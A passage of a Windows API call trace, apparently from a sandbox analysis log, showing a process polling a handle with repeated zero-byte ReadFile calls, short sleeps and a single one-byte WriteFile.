	[0228.011] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.011] GetLastError () returned 0x218
	[0228.011] Sleep (dwMilliseconds=0xa) 
	[0228.026] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.027] GetLastError () returned 0x218
	[0228.027] Sleep (dwMilliseconds=0xa) 
	[0228.073] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.073] GetLastError () returned 0x218
	[0228.073] Sleep (dwMilliseconds=0xa) 
	[0228.105] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.105] GetLastError () returned 0x218
	[0228.105] Sleep (dwMilliseconds=0xa) 
	[0228.151] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.151] GetLastError () returned 0x218
	[0228.151] Sleep (dwMilliseconds=0xa) 
	[0228.166] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.166] GetLastError () returned 0x218
	[0228.166] Sleep (dwMilliseconds=0xa) 
	[0228.182] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.182] GetLastError () returned 0x218
	[0228.182] Sleep (dwMilliseconds=0xa) 
	[0228.198] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.198] GetLastError () returned 0x218
	[0228.198] Sleep (dwMilliseconds=0xa) 
	[0228.214] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.214] GetLastError () returned 0x218
	[0228.214] Sleep (dwMilliseconds=0xa) 
	[0228.229] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.229] GetLastError () returned 0x218
	[0228.229] Sleep (dwMilliseconds=0xa) 
	[0228.244] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.244] GetLastError () returned 0x218
	[0228.244] Sleep (dwMilliseconds=0xa) 
	[0228.261] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.261] GetLastError () returned 0x218
	[0228.261] Sleep (dwMilliseconds=0xa) 
	[0228.314] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.314] GetLastError () returned 0x218
	[0228.314] Sleep (dwMilliseconds=0xa) 
	[0228.353] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.354] GetLastError () returned 0x218
	[0228.354] Sleep (dwMilliseconds=0xa) 
	[0228.400] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.400] GetLastError () returned 0x218
	[0228.401] Sleep (dwMilliseconds=0xa) 
	[0228.443] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.443] GetLastError () returned 0x218
	[0228.443] Sleep (dwMilliseconds=0xa) 
	[0228.448] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.448] GetLastError () returned 0x218
	[0228.448] Sleep (dwMilliseconds=0xa) 
	[0228.464] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.464] GetLastError () returned 0x218
	[0228.464] Sleep (dwMilliseconds=0xa) 
	[0228.479] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.479] GetLastError () returned 0x218
	[0228.479] Sleep (dwMilliseconds=0xa) 
	[0228.495] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.495] GetLastError () returned 0x218
	[0228.495] Sleep (dwMilliseconds=0xa) 
	[0228.511] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.511] GetLastError () returned 0x218
	[0228.511] Sleep (dwMilliseconds=0xa) 
	[0228.666] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.666] GetLastError () returned 0x218
	[0228.666] Sleep (dwMilliseconds=0xa) 
	[0228.857] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.857] GetLastError () returned 0x218
	[0228.857] Sleep (dwMilliseconds=0xa) 
	[0228.914] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0228.914] GetLastError () returned 0x218
	[0228.914] Sleep (dwMilliseconds=0xa) 
	[0229.275] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0229.275] GetLastError () returned 0x218
	[0229.275] Sleep (dwMilliseconds=0xa) 
	[0229.290] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0229.290] GetLastError () returned 0x218
	[0229.290] Sleep (dwMilliseconds=0xa) 
	[0229.306] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0229.306] GetLastError () returned 0x218
	[0229.306] Sleep (dwMilliseconds=0xa) 
	[0229.324] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0229.324] GetLastError () returned 0x218
	[0229.324] Sleep (dwMilliseconds=0xa) 
	[0229.338] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0229.338] GetLastError () returned 0x218
	[0229.338] Sleep (dwMilliseconds=0xa) 
	[0229.354] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0229.354] GetLastError () returned 0x218
	[0229.354] Sleep (dwMilliseconds=0xa) 
	[0229.370] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0229.371] GetLastError () returned 0x218
	[0229.371] Sleep (dwMilliseconds=0x3e8) 
	[0230.398] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0230.398] Sleep (dwMilliseconds=0xa) 
	[0230.413] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.413] GetLastError () returned 0x218
	[0230.413] Sleep (dwMilliseconds=0xa) 
	[0230.431] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.431] GetLastError () returned 0x218
	[0230.431] Sleep (dwMilliseconds=0xa) 
	[0230.481] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.481] GetLastError () returned 0x218
	[0230.481] Sleep (dwMilliseconds=0xa) 
	[0230.491] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.491] GetLastError () returned 0x218
	[0230.491] Sleep (dwMilliseconds=0xa) 
	[0230.506] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.506] GetLastError () returned 0x218
	[0230.506] Sleep (dwMilliseconds=0xa) 
	[0230.554] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.554] GetLastError () returned 0x218
	[0230.554] Sleep (dwMilliseconds=0xa) 
	[0230.600] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.600] GetLastError () returned 0x218
	[0230.600] Sleep (dwMilliseconds=0xa) 
	[0230.632] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.632] GetLastError () returned 0x218
	[0230.632] Sleep (dwMilliseconds=0xa) 
	[0230.647] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.647] GetLastError () returned 0x218
	[0230.647] Sleep (dwMilliseconds=0xa) 
	[0230.663] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.663] GetLastError () returned 0x218
	[0230.663] Sleep (dwMilliseconds=0xa) 
	[0230.684] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.684] GetLastError () returned 0x218
	[0230.684] Sleep (dwMilliseconds=0xa) 
	[0230.694] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.694] GetLastError () returned 0x218
	[0230.694] Sleep (dwMilliseconds=0xa) 
	[0230.710] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.710] GetLastError () returned 0x218
	[0230.710] Sleep (dwMilliseconds=0xa) 
	[0230.728] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.728] GetLastError () returned 0x218
	[0230.728] Sleep (dwMilliseconds=0xa) 
	[0230.741] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.741] GetLastError () returned 0x218
	[0230.741] Sleep (dwMilliseconds=0xa) 
	[0230.789] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.789] GetLastError () returned 0x218
	[0230.789] Sleep (dwMilliseconds=0xa) 
	[0230.835] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.835] GetLastError () returned 0x218
	[0230.835] Sleep (dwMilliseconds=0xa) 
	[0230.881] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.881] GetLastError () returned 0x218
	[0230.881] Sleep (dwMilliseconds=0xa) 
	[0230.897] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.897] GetLastError () returned 0x218
	[0230.897] Sleep (dwMilliseconds=0xa) 
	[0230.912] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.912] GetLastError () returned 0x218
	[0230.912] Sleep (dwMilliseconds=0xa) 
	[0230.928] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.928] GetLastError () returned 0x218
	[0230.929] Sleep (dwMilliseconds=0xa) 
	[0230.956] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.956] GetLastError () returned 0x218
	[0230.956] Sleep (dwMilliseconds=0xa) 
	[0230.960] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.960] GetLastError () returned 0x218
	[0230.960] Sleep (dwMilliseconds=0xa) 
	[0230.974] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.974] GetLastError () returned 0x218
	[0230.974] Sleep (dwMilliseconds=0xa) 
	[0230.990] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0230.991] GetLastError () returned 0x218
	[0230.991] Sleep (dwMilliseconds=0xa) 
	[0231.037] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.037] GetLastError () returned 0x218
	[0231.037] Sleep (dwMilliseconds=0xa) 
	[0231.084] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.084] GetLastError () returned 0x218
	[0231.084] Sleep (dwMilliseconds=0xa) 
	[0231.161] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.161] GetLastError () returned 0x218
	[0231.161] Sleep (dwMilliseconds=0xa) 
	[0231.220] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.220] GetLastError () returned 0x218
	[0231.220] Sleep (dwMilliseconds=0xa) 
	[0231.224] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.224] GetLastError () returned 0x218
	[0231.224] Sleep (dwMilliseconds=0xa) 
	[0231.240] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.240] GetLastError () returned 0x218
	[0231.240] Sleep (dwMilliseconds=0xa) 
	[0231.255] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.255] GetLastError () returned 0x218
	[0231.255] Sleep (dwMilliseconds=0xa) 
	[0231.271] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.271] GetLastError () returned 0x218
	[0231.271] Sleep (dwMilliseconds=0xa) 
	[0231.286] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.286] GetLastError () returned 0x218
	[0231.286] Sleep (dwMilliseconds=0xa) 
	[0231.302] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.302] GetLastError () returned 0x218
	[0231.302] Sleep (dwMilliseconds=0xa) 
	[0231.318] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.318] GetLastError () returned 0x218
	[0231.318] Sleep (dwMilliseconds=0xa) 
	[0231.353] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.353] GetLastError () returned 0x218
	[0231.353] Sleep (dwMilliseconds=0xa) 
	[0231.396] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.396] GetLastError () returned 0x218
	[0231.396] Sleep (dwMilliseconds=0xa) 
	[0231.458] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.458] GetLastError () returned 0x218
	[0231.458] Sleep (dwMilliseconds=0xa) 
	[0231.489] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.489] GetLastError () returned 0x218
	[0231.489] Sleep (dwMilliseconds=0xa) 
	[0231.505] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.505] GetLastError () returned 0x218
	[0231.505] Sleep (dwMilliseconds=0xa) 
	[0231.521] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.521] GetLastError () returned 0x218
	[0231.521] Sleep (dwMilliseconds=0xa) 
	[0231.536] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.536] GetLastError () returned 0x218
	[0231.536] Sleep (dwMilliseconds=0xa) 
	[0231.552] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0231.552] GetLastError () returned 0x218
	[0231.552] Sleep (dwMilliseconds=0xa) 
